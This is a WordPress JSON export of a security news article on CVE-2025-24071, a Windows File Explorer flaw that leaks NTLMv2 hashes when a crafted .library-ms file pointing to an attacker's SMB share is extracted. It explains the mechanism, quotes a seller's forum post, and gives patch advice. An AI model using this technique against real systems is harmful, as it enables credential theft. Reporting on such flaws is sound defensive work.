{"id":2699,"date":"2025-03-19T10:03:37","date_gmt":"2025-03-19T10:03:37","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/03\/19\/microsoft-windows-file-explorer-vulnerability-let-attackers-perform-network-spoofing-poc-released\/"},"modified":"2025-03-19T10:03:37","modified_gmt":"2025-03-19T10:03:37","slug":"microsoft-windows-file-explorer-vulnerability-let-attackers-perform-network-spoofing-poc-released","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/03\/19\/microsoft-windows-file-explorer-vulnerability-let-attackers-perform-network-spoofing-poc-released\/","title":{"rendered":"Microsoft Windows File Explorer Vulnerability Let Attackers Perform Network Spoofing \u2013 PoC Released"},"content":{"rendered":"<p>    Microsoft Windows File Explorer Vulnerability Let Attackers Perform Network Spoofing \u2013 PoC Released<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A critical vulnerability in <a href=\"https:\/\/cybersecuritynews.com\/windows-file-explorer-vulnerability-exploited\/\" target=\"_blank\" rel=\"noreferrer noopener\">Windows File Explorer<\/a>, identified as CVE-2025-24071, enables attackers to steal NTLM hashed passwords without any user interaction beyond simply extracting a compressed file.\u00a0<\/p>\n<p>Security researchers have released a proof-of-concept exploit demonstrating this high-severity flaw, which Microsoft patched in its March 2025 updates.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Microsoft Windows File Explorer Vulnerability<\/strong><\/h2>\n<p>The vulnerability, dubbed \u201cNTLM Hash Leak via RAR\/ZIP Extraction,\u201d exploits Windows Explorer\u2019s automatic file processing mechanism.\u00a0<\/p>\n<p>When a specially crafted .library-ms file containing a malicious SMB path is extracted from a compressed archive, Windows Explorer automatically parses its contents to generate previews and index metadata.<\/p>\n<p>This automatic processing occurs even if the user never explicitly opens the extracted file.\u00a0<\/p>\n<p>The .library-ms file format, which is XML-based and trusted by Windows Explorer to define library locations, includes a &lt;simpleLocation&gt; tag that points to an attacker-controlled SMB server, said security researcher <a href=\"https:\/\/cti.monster\/blog\/2025\/03\/18\/CVE-2025-24071.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">with alias<\/a> \u201c0x6rss\u201d.<\/p>\n<figure class=\"wp-block-video\"><video controls src=\"https:\/\/cti.monster\/assets\/video\/procmon.mp4\"><\/video><\/figure>\n<p>Upon extraction, Windows Explorer attempts to resolve the embedded SMB path (e.g., \\192.168.1.116shared) automatically to gather <a href=\"https:\/\/cybersecuritynews.com\/hackers-hide-web-skimmer-stealer-within-exif-metadata\/\" target=\"_blank\" rel=\"noreferrer noopener\">metadata<\/a>.\u00a0<\/p>\n<p>This action triggers an NTLM authentication handshake from the victim\u2019s system to the attacker\u2019s server, leaking the victim\u2019s NTLMv2 hash without any user interaction.<\/p>\n<p>Using process monitoring tools, researchers observed that immediately after extraction, both Explorer.exe and SearchProtocolHost.exe (part of Windows\u2019 indexing service) automatically perform several operations on the .library-ms file:<\/p>\n<ul class=\"wp-block-list\">\n<li>\n<strong>CreateFile: <\/strong>Opening the file automatically<\/li>\n<li>\n<strong>ReadFile:<\/strong> Reading the file contents<\/li>\n<li>\n<strong>QueryBasicInformationFile:<\/strong> Extracting metadata<\/li>\n<li>\n<strong>CloseFile:<\/strong> Closing the file after processing<\/li>\n<\/ul>\n<p>Wireshark captures confirm that these actions immediately trigger SMB communication attempts, including an NTLM authentication handshake.<\/p>\n<figure class=\"wp-block-table is-style-stripes\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Risk Factors<\/strong><\/td>\n<td><strong>Details<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Affected Products<\/td>\n<td>Microsoft Windows (specifically Windows File Explorer)<\/td>\n<\/tr>\n<tr>\n<td>Impact<\/td>\n<td>-Leaks victim\u2019s NTLMv2-Credential theft for pass-the-hash attacks-Potential offline NTLM hash cracking-Creates spoofing vulnerability\u00a0<\/td>\n<\/tr>\n<tr>\n<td>Exploit Prerequisites<\/td>\n<td>-User must extract a specially crafted .library-ms file-Attacker needs to set up an SMB server to receive authentication request<\/td>\n<\/tr>\n<tr>\n<td>CVSS 3.1 Score<\/td>\n<td>7.5 (Important )<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h2 class=\"wp-block-heading\"><strong>PoC Exploitation<\/strong><\/h2>\n<p>The vulnerability allows for exposure of sensitive information to unauthorized actors, enabling network spoofing attacks.<\/p>\n<p>A security researcher with the handle 0x6rss published a proof-of-concept exploit on <a href=\"https:\/\/cybersecuritynews.com\/ai-assisted-fake-github-repositories-steal-sensitive-data\/\" target=\"_blank\" rel=\"noreferrer noopener\">GitHub<\/a> on March 16, 2025.\u00a0The PoC includes a Python script that generates the malicious .library-ms file and can be used with a simple command: python poc.py<\/p>\n<p>Evidence suggests this vulnerability may have been sold and exploited in the wild before its public disclosure.\u00a0<\/p>\n<p>A threat actor known as \u201cKrypt0n,\u201d reportedly the developer of malware called \u201cEncryptHub Stealer,\u201d allegedly offered the exploit for sale on underground forums.<\/p>\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXdH8Atl2dEqQNk4YkILA4NwKRlpNnzAYPMxTder9cTYghYiCHB-0RFLgpTt_xtalHUf7sw2looAnGAS2BCVfJKVNDaw6LqO9DwZKDofI9B32f3JN3Dd0pRBcbPC3agnfTY4JhOs?key=ZjJC4nOkzCbIeZxTjcKE4MAJ\" alt=\"\"><figcaption class=\"wp-element-caption\">Threat Actor\u2019s post<\/figcaption><\/figure>\n<p>According to translated forum posts, the attacker explained: \u201cThe server where the hashes are sent is created locally, for example, on a VPS.\u00a0<\/p>\n<p>Then, using an exploit, you generate a config with your IP, share, etc. [\u2026] If the user simply opens Explorer or accesses the shared folder, an automatic redirect occurs, and the user\u2019s hash is sent to your server.\u201d<\/p>\n<h2 class=\"wp-block-heading\"><strong>Mitigation<\/strong><\/h2>\n<p>Microsoft addressed this vulnerability with the release of its March 2025 Patch Tuesday updates on March 11.<\/p>\n<p>All Windows users are strongly advised to apply these security updates immediately. This vulnerability adds to a growing list of NTLM-related flaws in Microsoft products, with researchers previously identifying similar credential-leaking issues in Microsoft Access, Publisher, and other applications.<\/p>\n<p>Security experts recommend keeping all Microsoft products updated and implementing additional protections against NTLM relay attacks, such as enabling SMB signing and disabling NTLM where possible.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 92%,rgb(169,184,195) 100%)\"><strong><code><strong><code>Investigate Real-World Malicious Links &amp; Phishing Attacks With\u00a0<strong>Threat Intelligence Lookup<\/strong>\u00a0-\u00a0<a href=\"https:\/\/intelligence.any.run\/plans?utm_source=csn&amp;utm_medium=article&amp;utm_campaign=enrichment&amp;utm_content=plans&amp;utm_term=180325\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Try for Free<\/a><\/code><\/strong><\/code><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/microsoft-windows-file-explorer-vulnerability-let-attackers\/\">Microsoft Windows File Explorer Vulnerability Let Attackers Perform Network Spoofing \u2013 PoC Released<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Guru Baran<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/microsoft-windows-file-explorer-vulnerability-let-attackers\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Microsoft Windows File Explorer Vulnerability Let Attackers Perform Network Spoofing \u2013 PoC Released A critical vulnerability in Windows File Explorer, identified as CVE-2025-24071, enables attackers to steal NTLM hashed passwords without any user interaction beyond simply extracting a compressed file.\u00a0 Security researchers have released a proof-of-concept exploit demonstrating this high-severity flaw, which Microsoft patched in [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,158,131,395],"tags":[130],"class_list":["post-2699","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-microsoft","category-vulnerability","category-windows","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/2699"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=2699"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/2699\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=2699"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=2699"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=2699"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}